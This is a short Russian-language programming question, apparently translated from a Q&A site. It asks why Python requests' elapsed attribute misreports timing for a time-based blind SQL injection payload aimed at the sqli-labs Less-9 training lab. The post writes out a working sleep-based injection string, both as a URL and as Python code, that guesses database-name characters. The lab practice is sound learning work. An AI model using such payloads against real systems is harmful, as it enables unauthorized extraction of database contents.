Я пытаюсь вызвать искусственную задержку ответа HTTP от веб-приложения (это метод, используемый для слепых SQL-инъекций). Если приведенный ниже HTTP-запрос отправляется из браузера, ответ от веб-сервера возвращается через 3 секунды (вызвано сном (3)):
http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+
Я пытаюсь сделать то же самое в Python 2.7, используя библиотеку запросов. Код у меня есть:
import requests
payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip
Я ожидал, что время в оба конца составит 3 секунды, но вместо этого я получаю значения 0,001371, 0,001616, 0,002228 и т. д. Я неправильно использую атрибут elapsed?